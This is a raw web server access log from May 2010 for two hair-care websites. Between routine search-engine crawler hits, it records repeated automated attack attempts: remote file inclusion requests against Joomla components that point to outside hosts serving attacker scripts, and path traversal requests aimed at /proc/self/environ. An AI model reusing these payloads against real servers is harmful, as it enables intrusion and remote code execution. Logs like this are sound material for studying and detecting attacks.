61.135.249.219 - - [17/May/2010:13:57:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12064 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:13:58:45 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:13:59:34 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:13:59:34 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:13:59:34 -0700] "GET /logs/access_100510.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:13:59:57 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12488 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:07 -0700] "GET /logs/access_100201.log/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:07 -0700] "GET /index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:07 -0700] "GET /logs/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:02:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
89.108.70.32 - - [17/May/2010:14:02:15 -0700] "GET /logs/access_100201.log/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:16 -0700] "GET /index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:16 -0700] "GET /logs/access_100201.log/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:16 -0700] "GET /logs/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.108.70.32 - - [17/May/2010:14:02:16 -0700] "GET /index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:02:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12553 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
89.108.70.32 - - [17/May/2010:14:02:16 -0700] "GET /logs/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:14:03:20 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:14:03:20 -0700] "GET /logs/access_100510.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:14:03:20 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:04:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13019 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
204.236.211.159 - - [17/May/2010:14:05:25 -0700] "GET /logs/access.log HTTP/1.1" 200 304609 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:43 -0700] "GET /logs/access_100125.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:45 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:46 -0700] "GET /logs/access_100125.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.72.10 - - [17/May/2010:14:06:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kortech.cn/bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:06:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13161 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:09:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13206 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:14:09:54 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13559 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:11:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14501 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:13:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:13:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12496 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:14:48 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:14:55 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:14:55 -0700] "GET /logs/access_100510.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:14:57 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:15:22 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:15:46 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:15:49 -0700] "GET /logs/access_100510.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:15:49 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:16:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15597 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
212.69.172.153 - - [17/May/2010:14:17:36 -0700] "GET /logs/access_100510.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:17:36 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:17:39 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:18:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16512 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:20:42 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16712 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
188.40.180.251 - - [17/May/2010:14:22:37 -0700] "GET /logs/access_100201.log/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [17/May/2010:14:22:38 -0700] "GET /index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [17/May/2010:14:22:38 -0700] "GET /logs/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [17/May/2010:14:22:39 -0700] "GET /logs/access_100201.log/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [17/May/2010:14:22:39 -0700] "GET /index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [17/May/2010:14:22:39 -0700] "GET /logs/index2.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:23:01 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16873 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "freehairsecrets.com"
212.69.172.153 - - [17/May/2010:14:23:02 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:23:02 -0700] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.172.153 - - [17/May/2010:14:23:04 -0700] "GET /logs/access_100510.log%20%20//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://liceum3.ru/help/sh/auto1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:03 -0700] "GET /logs/access_091221.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:03 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:04 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:21 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:21 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:21 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:24:29 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:24:29 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:24:29 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:31 -0700] "GET /logs/access_100412.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:31 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:31 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:37 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:41 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:24:42 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:24:46 -0700] "GET /logs/access_091221.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:46 -0700] "GET /logs/access_100315.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:47 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:24:47 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:25:01 -0700] "GET /logs/access_100412.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:25:01 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:25:01 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.137.18 - - [17/May/2010:14:25:01 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:25:03 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:25:03 -0700] "GET /logs/access_091221.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:25:19 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12642 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:25:38 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:25:38 -0700] "GET /logs/access.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:25:38 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:25:43 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:25:43 -0700] "GET /logs/access.log//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:25:43 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:27:37 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13014 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
64.246.3.210 - - [17/May/2010:14:27:53 -0700] "GET /logs/access_100201.log/index.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.246.3.210 - - [17/May/2010:14:27:53 -0700] "GET /index.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
64.246.3.210 - - [17/May/2010:14:27:53 -0700] "GET /logs/index.php?option=com_phocaguestbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:29:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13016 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:30:00 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:30:00 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:30:00 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:30:02 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:30:02 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:30:02 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:31:03 -0700] "GET /logs/access_100125.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:31:03 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:31:04 -0700] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
211.189.18.242 - - [17/May/2010:14:31:49 -0700] "GET /logs/access_100308.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:32:13 -0700] "GET /freehairsecretsphp/viewtopic.php?p=20897 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
64.128.80.17 - - [17/May/2010:14:32:32 -0700] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.128.80.17 - - [17/May/2010:14:32:34 -0700] "GET /logs/access_100215.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:33:10 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:34:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6382 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "growlonghairfast.com"
61.135.249.219 - - [17/May/2010:14:36:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18803 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:14:36:55 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:39:08 -0700] "GET /freehairsecretsphp/viewtopic.php?p=4385 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
211.189.18.242 - - [17/May/2010:14:39:27 -0700] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
77.221.137.18 - - [17/May/2010:14:40:25 -0700] "GET /logs//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.137.18 - - [17/May/2010:14:40:28 -0700] "GET /main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.221.137.18 - - [17/May/2010:14:40:28 -0700] "GET /logs/access.log%20%20//main.php?sayfa=http://nesd.interfree.it/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:41:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5511 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
61.135.249.219 - - [17/May/2010:14:43:44 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6435 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; YoudaoBot/1.0; http://www.youdao.com/help/webmaster/spider/; )" "www.freehairsecrets.com"
